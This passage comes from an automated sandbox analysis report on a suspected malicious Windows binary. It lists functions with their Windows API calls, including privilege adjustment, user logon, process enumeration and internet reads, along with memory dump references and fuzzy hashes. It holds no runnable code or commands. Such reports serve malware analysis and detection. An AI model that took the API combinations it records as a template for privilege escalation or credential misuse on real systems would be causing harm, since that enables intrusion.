                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2576544623-0
                                                                                                                    • Opcode ID: 2acadb4dd35d9e866d148d08aae40bcda7933016c7deebec0c723d06d0d1c18f
                                                                                                                    • Instruction ID: 99037cf0c2db570b946ea9585ece03329b2028af9e9f9429b5e93001e324c097
                                                                                                                    • Opcode Fuzzy Hash: 2acadb4dd35d9e866d148d08aae40bcda7933016c7deebec0c723d06d0d1c18f
                                                                                                                    • Instruction Fuzzy Hash: 16517E71504311AFD712EF24DC81E6BB7E8FF95710F50482DF5959B2A2EB70A908CB92
                                                                                                                    Function 0037E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0037E628
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen
                                                                                                                    • String ID: ($|
                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                    • Opcode ID: fee8bedf99fcc958b1901fdc38a14614ce0f78af72ff030bb2838c19b5b60530
                                                                                                                    • Instruction ID: a4865fb11ea87026c77d9878af6ed8742fb1d880f748bde6487d7ccbde43b6e0
                                                                                                                    • Opcode Fuzzy Hash: fee8bedf99fcc958b1901fdc38a14614ce0f78af72ff030bb2838c19b5b60530
                                                                                                                    • Instruction Fuzzy Hash: 19323675A007059FD729CF29C48196AB7F1FF48310B15C4AEE89ADB7A1E774E941CB40
                                                                                                                    Function 003922EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0039180A,00000000), ref: 003923E1
                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00392418
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 599397726-0
                                                                                                                    • Opcode ID: 82d003d872ab622a7b2f32fc528f25d63903af3213da83d8fc4996d81ca229e6
                                                                                                                    • Instruction ID: 5e3699359d595ab083979fe1d8f1550879034c10f2d9d9736706c8f72eaea773
                                                                                                                    • Opcode Fuzzy Hash: 82d003d872ab622a7b2f32fc528f25d63903af3213da83d8fc4996d81ca229e6
                                                                                                                    • Instruction Fuzzy Hash: CA41F575A04A09FFEF12DE96DCC1FBBB7FCEB40314F10402AF641AA141DA75AE419A60
                                                                                                                    Function 0038B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038B343
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0038B39D
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0038B3EA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1682464887-0
                                                                                                                    • Opcode ID: 419edd0c34dd6a372852c6f9284aa072d09c3a3d4d102b0912e41a48ddea549f
                                                                                                                    • Instruction ID: a56183dec17259800c18f3d29d5f880e2d99c3ed97a29e427a4cc802fc1dbb01
                                                                                                                    • Opcode Fuzzy Hash: 419edd0c34dd6a372852c6f9284aa072d09c3a3d4d102b0912e41a48ddea549f
                                                                                                                    • Instruction Fuzzy Hash: AC217135A00618EFCB01EFA5E881AEDFBB8FF49310F1480AAE905AB351CB319915CB50
                                                                                                                    Function 003787E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00340DB6: std::exception::exception.LIBCMT ref: 00340DEC
                                                                                                                      • Part of subcall function 00340DB6: __CxxThrowException@8.LIBCMT ref: 00340E01
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037882B
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00378858
                                                                                                                    • GetLastError.KERNEL32 ref: 00378865
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1922334811-0
                                                                                                                    • Opcode ID: 0cc55142a6878359346d6d96c3702b32da21c694d818b1cadea090940ba0ba2a
                                                                                                                    • Instruction ID: 7461ba0ac5baed47c981690b72f701128ec1c253a6109c18f8591f8d207c080e
                                                                                                                    • Opcode Fuzzy Hash: 0cc55142a6878359346d6d96c3702b32da21c694d818b1cadea090940ba0ba2a
                                                                                                                    • Instruction Fuzzy Hash: 3C116DB2914204AFE729DFA4DC89D6BB7FCFB45711B20852EE45997241EA34BC408B60
                                                                                                                    Function 0037874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00378774
                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0037878B
                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0037879B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    • Opcode ID: b146d346656402bd1b7f21aad43fb2befc6eefa212c049c5875630fc37174e6c
                                                                                                                    • Instruction ID: 86d7e1a59da91f0a18fda3358458b879f86f0bcb0fc7111eebb54684416df0ae
                                                                                                                    • Opcode Fuzzy Hash: b146d346656402bd1b7f21aad43fb2befc6eefa212c049c5875630fc37174e6c
                                                                                                                    • Instruction Fuzzy Hash: 90F04975A5130CBFDF04DFF4DC89ABEBBBCEF08301F1084A9A902E2181E6756A048B50
                                                                                                                    Function 00388889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __time64.LIBCMT ref: 0038889B
                                                                                                                      • Part of subcall function 0034520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00388F6E,00000000,?,?,?,?,0038911F,00000000,?), ref: 00345213
                                                                                                                      • Part of subcall function 0034520A: __aulldiv.LIBCMT ref: 00345233
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                    • String ID: 0e>
                                                                                                                    • API String ID: 2893107130-46251723
                                                                                                                    • Opcode ID: e7cc43fe6c86f79147fcfc42109e30412037b8e47bd65f1b122fa3e0835ae449
                                                                                                                    • Instruction ID: 634be2497441d42c34a238f37916ef206d7e310ce85de8afb1f52f36784ee212
                                                                                                                    • Opcode Fuzzy Hash: e7cc43fe6c86f79147fcfc42109e30412037b8e47bd65f1b122fa3e0835ae449
                                                                                                                    • Instruction Fuzzy Hash: 6821AF326256108BC72ACF29D881A52B3E5EBA5321F698F6CD1F5CF2C0CA74B905CB54
                                                                                                                    Function 0038C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038C6FB
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038C72B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    • Opcode ID: d198f9845b6f9b119dc0a23f7af41c4cc6963fae9a946245e0152e88f6e05245
                                                                                                                    • Instruction ID: 5bed68ef432c5fd1458482c3f2bf23008ab8af442f809d79e60056b98d1431e0
                                                                                                                    • Opcode Fuzzy Hash: d198f9845b6f9b119dc0a23f7af41c4cc6963fae9a946245e0152e88f6e05245
                                                                                                                    • Instruction Fuzzy Hash: A111A1766006009FDB11EF29D845A2AF7E8FF85324F04851EF8AACB291DB30AC01CF91
                                                                                                                    Function 0038A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00399468,?,003AFB84,?), ref: 0038A097
                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00399468,?,003AFB84,?), ref: 0038A0A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: 3e8e5f68faceef76068a534a789fece0f8b40071f9e6cb6a6ce1d7a8610348b0
                                                                                                                    • Instruction ID: 3689219c98b393d3c69b7800c62c1df6d6fbc57d70b639252e78468c006ee6c0
                                                                                                                    • Opcode Fuzzy Hash: 3e8e5f68faceef76068a534a789fece0f8b40071f9e6cb6a6ce1d7a8610348b0
                                                                                                                    • Instruction Fuzzy Hash: 97F0823510522DABDB22AFA4DC48FEA776CBF09362F004166F909D6191D670A944CBE1
                                                                                                                    Function 003781CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00378309), ref: 003781E0
                                                                                                                    • CloseHandle.KERNEL32(?,?,00378309), ref: 003781F2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 81990902-0
                                                                                                                    • Opcode ID: 3e4695172f496bdc6b0d95de64ac20fd4c4211cdba71d47ba27240307fc5af2a
                                                                                                                    • Instruction ID: 9014db8f7ee965427fd23eb45c87ab121c7e365dbc82e565e12abc07da74622d
                                                                                                                    • Opcode Fuzzy Hash: 3e4695172f496bdc6b0d95de64ac20fd4c4211cdba71d47ba27240307fc5af2a
                                                                                                                    • Instruction Fuzzy Hash: D8E0E675010510AFE7272B61EC09D7777EDEF04311B14892DF59588470DB716CA1DB10
                                                                                                                    Function 0034A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00348D57,?,?,?,00000001), ref: 0034A15A
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0034A163
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 0ecf645290d2c57155b5540a06715ce87b9e670f27754294702c4597cabad5b7
                                                                                                                    • Instruction ID: db3ce87b1fc0f375b066133f3a523bb0f21d5d35272f79f32fd4c7cd253d4810
                                                                                                                    • Opcode Fuzzy Hash: 0ecf645290d2c57155b5540a06715ce87b9e670f27754294702c4597cabad5b7
                                                                                                                    • Instruction Fuzzy Hash: 2DB09235054208AFCF022BD1EC59B883F6CEB46BA2F404020F60D840A0CBA254508A91
                                                                                                                    Function 0034F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d746148db3816670f11a69597c95b2eda9a2b7b53cca0f14ac58dce0dd82e381
                                                                                                                    • Instruction ID: d77156eadb49c3130baca7eff9a204b55b490cd433ad2a0e306833e059ad9632
                                                                                                                    • Opcode Fuzzy Hash: d746148db3816670f11a69597c95b2eda9a2b7b53cca0f14ac58dce0dd82e381
                                                                                                                    • Instruction Fuzzy Hash: FC32D221D29F414DDB239634D872335A68DAFB73C8F19D737E819B9EA6EB29D4834100
                                                                                                                    Function 0035242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 16539deb70ff1715336e46526802ef8d417c6831d7ea3d6239166736476960eb
                                                                                                                    • Instruction ID: abad4dc9fc3b84c47bd5282c3a7c4debf0aee735c3476fd541b977045dfaaa3d
                                                                                                                    • Opcode Fuzzy Hash: 16539deb70ff1715336e46526802ef8d417c6831d7ea3d6239166736476960eb
                                                                                                                    • Instruction Fuzzy Hash: D6B1E320E2AF414DD72396398831336BB9CAFBB2D9F51D71BFD1A74E22EB2185834141
                                                                                                                    Function 00384C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00384C4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: mouse_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2434400541-0
                                                                                                                    • Opcode ID: b6bac6640f8ef59584259632c5c9da4ec351b9b3c7a7593ea4fd4fcd0a94e69c
                                                                                                                    • Instruction ID: a8fc91ce8ca7a98f014d10da466d6ce3a54c12cc2a93189fdbe320ddb4eda256
                                                                                                                    • Opcode Fuzzy Hash: b6bac6640f8ef59584259632c5c9da4ec351b9b3c7a7593ea4fd4fcd0a94e69c
                                                                                                                    • Instruction Fuzzy Hash: 5CD05EA116530B38EC1E2720AE0FF7A012CE341782FD181C971028ACC1FD805D405330
                                                                                                                    Function 003787B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00378389), ref: 003787D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LogonUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1244722697-0
                                                                                                                    • Opcode ID: a105726f83532e4c7adc27ffbabe0d7daa3c1331e9c63484be766dea5daffe4e
                                                                                                                    • Instruction ID: 9a65dbf67b7cb54ca55f6152d563178ffd2e63bf642b67c1ec5cbd75751885de
                                                                                                                    • Opcode Fuzzy Hash: a105726f83532e4c7adc27ffbabe0d7daa3c1331e9c63484be766dea5daffe4e
                                                                                                                    • Instruction Fuzzy Hash: 35D05E322A050EAFEF018EA4DC01EBE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                                                                    Function 0034A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0034A12A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 24993500d51c2c0f754bb990ab18cb84689cf11bda4670bb38ecc1dbcc43427f
                                                                                                                    • Instruction ID: b5804a53ad2062a9f07955920703e86056f07b77ef15033e6214813dedbaa6e9
                                                                                                                    • Opcode Fuzzy Hash: 24993500d51c2c0f754bb990ab18cb84689cf11bda4670bb38ecc1dbcc43427f
                                                                                                                    • Instruction Fuzzy Hash: 0FA0113000020CAB8F022B82EC08888BFACEA022A0B008020F80C800228B32A8208A80
                                                                                                                    Function 00360AB4 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
